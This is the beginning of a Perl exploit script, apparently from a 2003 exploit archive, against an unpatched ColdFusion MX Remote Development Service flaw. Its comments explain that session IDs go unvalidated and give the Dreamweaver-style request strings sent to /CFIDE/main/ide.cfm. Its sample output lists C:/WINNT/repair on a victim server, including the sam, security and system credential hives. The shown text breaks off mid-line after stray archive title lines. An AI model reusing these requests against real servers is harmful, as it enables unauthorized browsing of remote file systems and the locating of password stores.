1 #!/usr/bin/perl
2 # RDS_c_Dump.pl
3 # By angry packet
4
5 ##
6 # THIS IS AN UNPATCHED VULNERABILITY − THIS IS AN UNPATCHED VULNERABILITY
7 #
8 # ColdFusion 6 MX Server does several things in order to get the remote dir structure, so we will need
9 # to recreate these functions. This is an "almost" complete emulation of a Dreamweaver client connection,
10 # in like one full HTTP/1.1 session within netcat.
11 #
12 # I would like to point out that the ASPSESSID is never validated, so you can change it on the fly.
13 #
14 # Due to certain current situations I am not allowed to release full exploit code with
15 # ( READ, RETRIEVE, WRITE ) functions.
16 #
17 # Sample output:
18 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
19 # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
20 #
21 # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
22 #
23 # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
24 # Content-Length: 37
25 # Please wait.. ..
26 # HTTP/1.1 100 Continue
27 # Server: Microsoft-IIS/5.0
28 # Date: Tue, 01 Jul 2003 10:30:43 GMT
29 #
30 # HTTP/1.1 200 OK
31 # Server: Microsoft-IIS/5.0
32 # Date: Tue, 01 Jul 2003 10:30:43 GMT
33 # Connection: close
34 # Content-Type: text/html
35 #
36 # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
37 # 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
38 # 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
39 # 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
40 # Vic7im1@cipher:~/Scripts/RDS_Sploit$
41 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
42
43
44 use strict;
45 use IO::Socket;
46
47 use vars qw($response @clength @rarray);
48
49 ## Dreamweaver string requests to ide.cfm
50 ## −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
51 #1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:  Content-Length: 46
52 #2: 3:STR:7:C:/_mm/STR:1:*STR:0:  Content-Length: 28
ColdFusion MX Remote Development Service Exploit
angry packet
07/07/2003
53 #3: 3:ST